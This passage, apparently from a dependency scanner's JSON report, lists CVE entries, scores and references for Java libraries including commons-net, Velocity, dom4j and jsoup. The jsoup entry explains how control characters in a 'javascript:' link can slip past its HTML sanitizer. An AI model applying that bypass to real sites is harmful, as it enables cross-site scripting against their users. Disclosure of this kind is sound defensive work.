This may lead to leakage of information about services running on the private network of the client. The default in version 3.9.0 is now false to ignore such hosts, as cURL does. See https://issues.apache.org/jira/browse/NET-711."}],"product_status":{"known_affected":["commons-net/commons-net@vers:maven/>=1.0.0|<=3.8.0"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2022/12/03/1"},{"summary":"Apache Advisory NET-711","url":"https://issues.apache.org/jira/browse/NET-711"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/o6yn9r9x6s94v97264hmgol1sf48mvx7"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/12/msg00038.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37533"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37533"},{"summary":"Debian Advisory dsa-5307","url":"https://www.debian.org/security/2022/dsa-5307"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N","version":"3.1"},"products":["commons-net/commons-net@vers:maven/>=1.0.0|<=3.8.0"]}],"title":"CVE-2021-37533/pkg:maven/commons-net/commons-net@3.6?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-26945"]}],"cve":"CVE-2020-26945"
,"cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-04-22T16:14:38","ids":[{"system_name":"CVE Record","text":"CVE-2020-26945"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"\"Deserialization errors in MyBatis\""},{"category":"details","details":"Vulnerability Details","text":"# \"Deserialization errors in MyBatis\" MyBatis before 3.5.6 mishandles deserialization of object streams leading to potential cache poisoning."}],"product_status":{"known_affected":["org.mybatis/mybatis@vers:maven/>=2.3.5|<=3.5.5"],"known_not_affected":["org.mybatis/mybatis@3.5.6"]},"references":[{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-26945"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-26945"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.mybatis/mybatis@vers:maven/>=2.3.5|<=3.5.5"]}],"title":"CVE-2020-26945/pkg:maven/org.mybatis/mybatis@3.4.6?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-13936"]}],"cve":"CVE-2020-13936","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2022-01-06T20:32:36","ids":[{"system_name":"CVE Record","text":"CVE-2020-13936"},{"system_name":"Oracle 
Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Gentoo Advisory","text":"glsa-202107-52"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Sandbox Bypass in Apache Velocity Engine"},{"category":"details","details":"Vulnerability Details","text":"# Sandbox Bypass in Apache Velocity Engine An attacker that is able to modify Velocity templates may execute arbitrary Java code or run arbitrary system commands with the same privileges as the account running the Servlet container. This applies to applications that allow untrusted users to upload/modify velocity templates running Apache Velocity Engine versions up to 2.2."}],"product_status":{"known_affected":["org.apache.velocity/velocity@vers:maven/>=1.5|<=1.7"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/03/10/1"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r01043f584cbd47959fabe18fff64de940f81a65024bb8dddbda31d9a%40%3Cuser.velocity.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r01043f584cbd47959fabe18fff64de940f81a65024bb8dddbda31d9a@%3Cuser.velocity.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0bc98e9cd080b4a13b905c571b9bed87e1a0878d44dbf21487c6cca4@%3Cdev.santuario.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r17cb932fab14801b14e5b97a7f05192f4f366ef260c10d4a8dba8ac9@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r293284c6806c73f51098001ea86a14271c39f72cd76af9e946d9d9ad@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r39de20c7e9c808b1f96790875d33e58c9c0aabb44fd9227e7b3dc5da@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r3ea4c4c908505b20a4c268330dfe7188b90c84dcf777728d02068ae6@%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4cd59453b65d4ac290fcb3b71fdf32b4f1f8989025e89558deb5a245@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r52a5129df402352adc34d052bab9234c8ef63596306506a89fdc7328@%3Cusers.activemq.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7f209b837217d2a0fe5977fb692e7f15d37fa5de8214bcdc4c21d9a7@%3Ccommits.turbine.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9dc2505651788ac668299774d9e7af4dc616be2f56fdc684d1170882@%3Cusers.activemq.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb042f3b0090e419cc9f5a3d32cf0baff283ccd6fcb1caea61915d6b6@%3Ccommits.velocity.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbee7270556f4172322936b5ecc9fabf0c09f00d4fa56c9de1963c340@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd2a89e17e8a9b451ce655f1a34117752ea1d18a22ce580d8baa824fd@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd7e865c87f9043c21d9c1fd9d4df866061d9a08cfc322771160d8058@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re641197d204765130618086238c73dd2ce5a3f94b33785b587d72726@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re8e7482fe54d289fc0229e61cc64947b63b12c3c312e9f25bf6f3b8c@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/reab5978b54a9f4c078402161e30a89c42807b198814acadbe6c862c7@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/rf7d369de88dc88a1347006a3323b3746d849234db40a8edfd5ebc436@%3Cdev.ws.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/03/msg00019.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-13936"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-13936"},{"summary":"Gentoo Advisory glsa-202107-52","url":"https://security.gentoo.org/glsa/202107-52"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.velocity/velocity@vers:maven/>=1.5|<=1.7"]}],"title":"CVE-2020-13936/pkg:maven/org.apache.velocity/velocity@1.7?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-23926"]}],"cve":"CVE-2021-23926","cwe":{"id":"776","name":"Improper Restriction of Recursive Entity References in DTDs"},"discovery_date":"2021-06-16T17:37:11","ids":[{"system_name":"CVE Record","text":"CVE-2021-23926"},{"system_name":"Apache Advisory","text":"XMLBEANS-517"},{"system_name":"Oracle 
Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210513-0004"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper Restriction of Recursive Entity References in Apache XMLBeans"},{"category":"details","details":"Vulnerability Details","text":"# Improper Restriction of Recursive Entity References in Apache XMLBeans The XML parsers used by XMLBeans up to version 2.6.0 did not set the properties needed to protect the user from malicious XML input. Vulnerabilities include possibilities for XML Entity Expansion attacks. Affects XMLBeans up to and including v2.6.0."}],"product_status":{"known_affected":["org.apache.xmlbeans/xmlbeans@vers:maven/>=2.2.0|<=2.6.0"]},"references":[{"summary":"Apache Advisory XMLBEANS-517","url":"https://issues.apache.org/jira/browse/XMLBEANS-517"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2dc5588009dc9f0310b7382269f932cc96cae4c3901b747dda1a7fed@%3Cjava-dev.axis.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbb01d10512098894cd5f22325588197532c64f1c818ea7e4120d40c1@%3Cjava-dev.axis.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/06/msg00024.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-23926"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-23926"},{"summary":"NetApp Advisory ntap-20210513-0004","url":"https://security.netapp.com/advisory/ntap-20210513-0004"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.1,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.1,"environmentalSeverity":"CRITICAL","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.1,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H","version":"3.1"},"products":["org.apache.xmlbeans/xmlbeans@vers:maven/>=2.2.0|<=2.6.0"]}],"title":"CVE-2021-23926/pkg:maven/org.apache.xmlbeans/xmlbeans@2.3.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-10683"]}],"cve":"CVE-2020-10683","cwe":{"id":"611","name":"Improper Restriction of XML External Entity Reference"},"discovery_date":"2020-06-05T16:13:36","ids":[{"system_name":"CVE Record","text":"CVE-2020-10683"},{"system_name":"Owasp Advisory","text":"XML_External_Entity_Prevention_Cheat_Sheet"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200518-0002"},{"system_name":"Red Hat Bugzilla","text":"redhat-bugzilla-1694235"}],"notes":[{"category":"description","details":"Vulnerability 
Description","text":"dom4j allows External Entities by default which might enable XXE attacks"},{"category":"details","details":"Vulnerability Details","text":"# dom4j allows External Entities by default which might enable XXE attacks dom4j before 2.1.3 allows external DTDs and External Entities by default, which might enable XXE attacks. However, there is popular external documentation from OWASP showing how to enable the safe, non-default behavior in any application that uses dom4j. Note: This advisory applies to `dom4j:dom4j` version 1.x legacy artifacts. To resolve this a change to the latest version of `org.dom4j:dom4j` is recommended."}],"product_status":{"known_affected":["dom4j/dom4j@vers:maven/>=1.1|<=1.6.1"],"known_not_affected":["dom4j/dom4j@2.1.3"]},"references":[{"summary":"Open Suse Mailing List","url":"http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00061.html"},{"summary":"Red Hat Bugzilla","url":"https://bugzilla.redhat.com/show_bug.cgi?id=1694235"},{"summary":"Owasp Advisory XML_External_Entity_Prevention_Cheat_Sheet","url":"https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r51f3f9801058e47153c0ad9bc6209d57a592fc0e7aefd787760911b8@%3Cdev.velocity.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r91c64cd51e68e97d524395474eaa25362d564572276b9917fcbf5c32@%3Cdev.velocity.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb1b990d7920ae0d50da5109b73b92bab736d46c9788dd4b135cb1a51@%3Cnotifications.freemarker.apache.org%3E"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10683"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10683"},{"summary":"NetApp Advisory ntap-20200518-0002","url":"https://security.netapp.com/advisory/ntap-20200518-0002"},{"summary":"Oracle Advisory 
cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["dom4j/dom4j@vers:maven/>=1.1|<=1.6.1"]}],"title":"CVE-2020-10683/pkg:maven/dom4j/dom4j@1.6.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-23640"]}],"cve":"CVE-2022-23640","cwe":{"id":"611","name":"Improper Restriction of XML External Entity Reference"},"discovery_date":"2022-03-02T21:30:54","ids":[{"system_name":"CVE Record","text":"CVE-2022-23640"},{"system_name":"GitHub 
Advisory","text":"GHSA-xvm2-9xvc-hx7f"}],"notes":[{"audience":"developers","category":"other","text":"Improper Restriction of Recursive Entity References in DTDs","title":"Additional CWE: 776"},{"category":"description","details":"Vulnerability Description","text":"Improper Restriction of XML External Entity Reference in com.monitorjbl:xlsx-streamer"},{"category":"details","details":"Vulnerability Details","text":"# Improper Restriction of XML External Entity Reference in com.monitorjbl:xlsx-streamer ### Impact Prior to xlsx-streamer 2.1.0, the XML parser that was used did not apply all the necessary settings to prevent XML Entity Expansion issues. ### Patches Upgrade to version 2.1.0. ### Workarounds No known workaround. ### References https://github.com/monitorjbl/excel-streaming-reader/commit/0749c7b9709db078ccdeada16d46a34bc2910c73 ### For more information If you have any questions or comments about this advisory: * Open an issue in [monitorjbl/excel-streaming-reader](https://github.com/monitorjbl/excel-streaming-reader)"}],"product_status":{"known_affected":["com.monitorjbl/xlsx-streamer@vers:maven/>=0.2.3|<=2.0.0"]},"references":[{"summary":"GitHub Advisory GHSA-xvm2-9xvc-hx7f","url":"https://github.com/monitorjbl/excel-streaming-reader/security/advisories/GHSA-xvm2-9xvc-hx7f"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-23640"},{"summary":"CVE 
Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-23640"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.monitorjbl/xlsx-streamer@vers:maven/>=0.2.3|<=2.0.0"]}],"title":"CVE-2022-23640/pkg:maven/com.monitorjbl/xlsx-streamer@2.0.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-36033"]}],"cve":"CVE-2022-36033","cwe":{"id":"79","name":"Improper Neutralization of Input During Web Page Generation"},"discovery_date":"2022-09-01T22:14:57","ids":[{"system_name":"CVE Record","text":"CVE-2022-36033"},{"system_name":"GitHub Advisory","text":"GHSA-gp7f-rwcx-9369"},{"system_name":"NetApp Advisory","text":"ntap-20221104-0006"},{"system_name":"Jsoup Advisory","text":"release-1"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jsoup may not sanitize code injection XSS attempts if SafeList.preserveRelativeLinks is enabled"},{"category":"details","details":"Vulnerability Details","text":"# jsoup may not sanitize code injection XSS attempts if SafeList.preserveRelativeLinks is enabled jsoup may incorrectly sanitize HTML including `javascript:` URL expressions, which could allow cross-site scripting (XSS) attacks when a reader subsequently clicks that link. 
If the non-default `SafeList.preserveRelativeLinks` option is enabled, HTML including `javascript:` URLs that have been crafted with control characters will not be sanitized. If the site that this HTML is published on does not set a Content Security Policy, an XSS attack is then possible. ### Impact Sites that accept input HTML from users and use jsoup to sanitize that HTML, may be vulnerable to cross-site scripting (XSS) attacks, if they have enabled `SafeList.preserveRelativeLinks` and do not set an appropriate Content Security Policy. ### Patches This issue is patched in jsoup 1.15.3. Users should upgrade to this version. Additionally, as the unsanitized input may have been persisted, old content should be cleaned again using the updated version. ### Workarounds To remediate this issue without immediately upgrading: - disable `SafeList.preserveRelativeLinks`, which will rewrite input URLs as absolute URLs - ensure an appropriate [Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP) is defined. (This should be used regardless of upgrading, as a defence-in-depth best practice.) ### Background and root cause jsoup includes a [Cleaner](https://jsoup.org/apidocs/org/jsoup/safety/Cleaner.html) component, which is designed to [sanitize input HTML](https://jsoup.org/cookbook/cleaning-html/safelist-sanitizer) against configurable safe-lists of acceptable tags, attributes, and attribute values. This includes removing potentially malicious attributes such as ``, which may enable XSS attacks. It does this by validating URL attributes against allowed URL protocols (e.g. `http`, `https`). However, an attacker may be able to bypass this check by embedding control characters into the href attribute value. This causes the Java URL class, which is used to resolve relative URLs to absolute URLs before checking the URL's protocol, to treat the URL as a relative URL. It is then resolved into an absolute URL with the configured base URI. 
For example, `java script:...` would resolve to `https://example.com/java script:...`. By default, when using a safe-list that allows `a` tags, jsoup will rewrite any relative URLs (e.g. `/foo/`) to an absolute URL (e.g. `https://example.com/foo/`). Therefore, this attack attempt would be successfully mitigated. However, if the option [SafeList.preserveRelativeLinks](https://jsoup.org/apidocs/org/jsoup/safety/Safelist.html#preserveRelativeLinks(boolean)) is enabled (which does not rewrite relative links to absolute), the input is left as-is. While Java will treat a path like `java script:` as a relative path, as it does not match the allowed characters of a URL spec, browsers may normalize out the control characters, and subsequently evaluate it as a `javascript:` spec inline expression. That disparity then leads to an XSS opportunity. Sites defining a Content Security Policy that does not allow javascript expressions in link URLs will not be impacted, as the policy will prevent the script's execution. 
### For more information If you have any questions or comments about this advisory: * Open an issue in [jsoup](https://github.com/jhy/jsoup) * Email the author of jsoup at [jonathan@hedley.net](mailto:jonathan@hedley.net) ### Credits Thanks to Jens Häderer, who reported this issue, and contributed to its resolution."}],"product_status":{"known_affected":["org.jsoup/jsoup@vers:maven/>=0.0.0|<1.15.3"],"known_not_affected":["org.jsoup/jsoup@1.15.3"]},"references":[{"summary":"GitHub Advisory GHSA-gp7f-rwcx-9369","url":"https://github.com/jhy/jsoup/security/advisories/GHSA-gp7f-rwcx-9369"},{"summary":"Jsoup Advisory","url":"https://jsoup.org/news/release-1.15.3"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-36033"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-36033"},{"summary":"NetApp Advisory ntap-20221104-0006","url":"https://security.netapp.com/advisory/ntap-20221104-0006"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":6.1,"baseSeverity":"MEDIUM","confidentialityImpact":"LOW","environmentalScore":6.1,"environmentalSeverity":"MEDIUM","integrityImpact":"LOW","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"LOW","modifiedPrivilegesRequired":"NONE","modifiedScope":"CHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"CHANGED","temporalScore":6.1,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","version":"3.1"},"products":["org.jsoup/jsoup@vers:maven/>=0.0.0|<1.15.3"]}],"title":"CVE-2022-36033/pkg:maven/org.jsoup/jsoup@1.10.2?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-37714"]}],"cve":"CVE-2021-37714","cwe":{"id":"248","name":"Uncaught 
Exception"},"discovery_date":"2021-08-23T19:42:38","ids":[{"system_name":"CVE Record","text":"CVE-2021-37714"},{"system_name":"GitHub Advisory","text":"GHSA-m72m-mhq2-9p6c"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"NetApp Advisory","text":"ntap-20220210-0022"},{"system_name":"Jsoup Advisory","text":"release-1"}],"notes":[{"audience":"developers","category":"other","text":"Loop with Unreachable Exit Condition","title":"Additional CWE: 835"},{"category":"description","details":"Vulnerability Description","text":"Uncaught Exception in jsoup"},{"category":"details","details":"Vulnerability Details","text":"# Uncaught Exception in jsoup ### Impact _What kind of vulnerability is it? Who is impacted?_ Those using jsoup to parse untrusted HTML or XML may be vulnerable to DOS attacks. If the parser is run on user supplied input, an attacker may supply content that causes the parser to get stuck (loop indefinitely until cancelled), to complete more slowly than usual, or to throw an unexpected exception. This effect may support a denial of service attack. ### Patches _Has the problem been patched? What versions should users upgrade to?_ Users should upgrade to jsoup 1.14.2 ### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ Users may rate limit input parsing. Users should limit the size of inputs based on system resources. 
Users should implement thread watchdogs to cap and timeout parse runtimes."}],"product_status":{"known_affected":["org.jsoup/jsoup@vers:maven/>=0.0.0|<1.14.2"],"known_not_affected":["org.jsoup/jsoup@1.14.2"]},"references":[{"summary":"GitHub Advisory GHSA-m72m-mhq2-9p6c","url":"https://github.com/jhy/jsoup/security/advisories/GHSA-m72m-mhq2-9p6c"},{"summary":"Jsoup Advisory","url":"https://jsoup.org/news/release-1.14.1"},{"summary":"Jsoup Advisory","url":"https://jsoup.org/news/release-1.14.2"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r215009dbf7467a9f6506d0c0024cb36cad30071010e62c9352cfaaf0@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r377b93d79817ce649e9e68b3456e6f499747ef1643fa987b342e082e@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3d71f18adb78e50f626dde689161ca63d3b7491bd9718fcddfaecba7@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r50e9c9466c592ca9d707a5dea549524d19e3287da08d8392f643960e@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r685c5235235ad0c26e86d0ee987fb802c9675de6081dbf0516464e0b@%3Cnotifications.james.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r97404676a5cf591988faedb887d64e278f522adcaa823d89ca69defe@%3Cnotifications.james.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc3354080fc67fb50b45b3c2d12dc4ca2a3c1c78dad3d3ba012c038aa@%3Cnotifications.james.apache.org%3E"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37714"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37714"},{"summary":"NetApp Advisory ntap-20220210-0022","url":"https://security.netapp.com/advisory/ntap-20220210-0022"},{"summary":"Oracle Advisory 
cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.jsoup/jsoup@vers:maven/>=0.0.0|<1.14.2"]}],"title":"CVE-2021-37714/pkg:maven/org.jsoup/jsoup@1.10.2?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-29425"]}]